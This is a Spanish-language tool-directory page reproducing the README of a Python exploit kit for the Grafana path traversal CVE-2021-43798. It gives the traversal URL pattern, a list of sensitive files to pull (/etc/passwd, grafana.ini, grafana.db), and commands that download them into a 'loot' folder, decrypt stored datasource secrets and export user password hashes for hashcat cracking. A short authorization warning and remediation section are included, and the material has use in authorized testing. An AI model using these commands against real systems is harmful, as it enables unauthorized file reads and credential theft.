Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-43798 — Kit de herramientas en Python para pruebas autorizadas del path traversal CVE-2021-43798 de Grafana, con PoC de lectura arbitraria de archivos, descifrado de secretos y exportación de hashes de usuario para evaluaciones de seguridad. | Kitploit
Herramientas/GitHubGitHub/okymi-x/cve-2021-43798
Descifrado de ContraseñasHerramientas de Cifrado/DescifradoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubokymi-x/cve-2021-43798

CVE-2021-43798

Kit de herramientas en Python para pruebas autorizadas del path traversal CVE-2021-43798 de Grafana, con PoC de lectura arbitraria de archivos, descifrado de secretos y exportación de hashes de usuario para evaluaciones de seguridad.

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-43798 - Grafana Lectura Arbitraria de Archivos

Kit de herramientas en Python para pruebas autorizadas de CVE-2021-43798, una vulnerabilidad de path traversal en Grafana que puede permitir lecturas arbitrarias de archivos sin autenticación a través de rutas de activos de plugins.

Este repositorio contiene:

  • grafana_poc.py: PoC interactivo de lectura arbitraria de archivos que guarda los archivos descargados localmente.
  • grafana_pass_decryptor.py: asistente para descifrar secretos de fuentes de datos de Grafana cifrados cuando grafana.ini y/o la secret_key están disponibles, y para exportar los hashes de contraseñas de usuarios de Grafana desde grafana.db.

Advertencia

Utilice este proyecto únicamente en sistemas que posea, opere, o para los que tenga permiso explícito por escrito para realizar pruebas. La explotación no autorizada puede exponer archivos sensibles, credenciales, claves privadas, contenidos de bases de datos y hashes de contraseñas de usuarios.

Resumen de la Vulnerabilidad

CVE-2021-43798 afecta a las versiones de Grafana desde 8.0.0-beta1 hasta 8.3.0. Las versiones parcheadas son 8.3.1, 8.2.7, 8.1.8 y 8.0.7.

El problema es accesible a través de rutas de activos de plugins como:

root@kitploit:~
/public/plugins/<plugin-id>/../../../../../../../../../../../../..<file>

Los archivos comunes solicitados durante una validación autorizada incluyen:

root@kitploit:~
/etc/passwd
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/self/cmdline

El acceso depende de los permisos del sistema operativo del proceso de Grafana.

Requisitos

  • Python 3.10+
  • requests
  • pycryptodome o cryptography para el descifrado de secretos

Instalar dependencias:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Guía de Uso

1. Leer Archivos Con El PoC

Ejecute el PoC interactivo contra un objetivo autorizado:

root@kitploit:~
python3 grafana_poc.py -H http://target:3000 -o loot

En el prompt, introduzca rutas absolutas:

root@kitploit:~
Download file > /etc/passwd
Download file > /etc/grafana/grafana.ini
Download file > /var/lib/grafana/grafana.db
Download file > exit

Los archivos descargados se guardan en el directorio de salida preservando una versión segura de la ruta remota, por ejemplo:

root@kitploit:~
loot/etc/grafana/grafana.ini
loot/var/lib/grafana/grafana.db

2. Descifrar Secretos de Grafana

Si tiene tanto grafana.ini como grafana.db, el descifrador puede leer la secret_key del archivo de configuración e intentar descifrar secretos cifrados de fuentes de datos, notificaciones de alertas y plugins:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db

Descifre un blob cifrado manualmente:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --secret-key SW2YcwTIb9zpOOhoPsMm \
  --blob R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Imprimir JSON delimitado por nuevas líneas:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --json

3. Exportar Hashes de Usuarios

Las contraseñas de usuarios de Grafana no son secretos cifrados. Son hashes PBKDF2 con sal. Expórtelos desde la tabla user:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --users

Exportar solo las líneas del modo 10900 de hashcat:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --db loot/var/lib/grafana/grafana.db \
  --users \
  --hashcat > hashes.txt

Remediación

Actualice Grafana a una versión parcheada:

  • 8.3.1 o posterior para la rama 8.3
  • 8.2.7 o posterior para la rama 8.2
  • 8.1.8 o posterior para la rama 8.1
  • 8.0.7 o posterior para la rama 8.0

Si la actualización inmediata no es posible, el aviso de Grafana señala que colocar un proxy inverso delante de Grafana que normalice las rutas de las solicitudes puede mitigar el comportamiento de traversal. Trate esto como un control temporal, no como un reemplazo del parche.

Referencias

  • Exploit-DB 50581: https://www.exploit-db.com/exploits/50581
  • Repositorio de referencia jas502n: https://github.com/jas502n/Grafana-CVE-2021-43798
  • Aviso de seguridad de Grafana GHSA-8pjx-jj86-j47p: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • Publicación del blog de Grafana sobre CVE-2021-43798: https://grafana.com/blog/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
  • Registro CVE de NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-43798

Créditos

El PoC público original se atribuye a s1gh en Exploit-DB. El flujo de trabajo de descifrado de secretos de Grafana está inspirado en investigaciones públicas y ejemplos de jas502n/Grafana-CVE-2021-43798, y este repositorio proporciona un asistente en Python para flujos de trabajo de laboratorio y evaluaciones autorizadas.

Descargar herramienta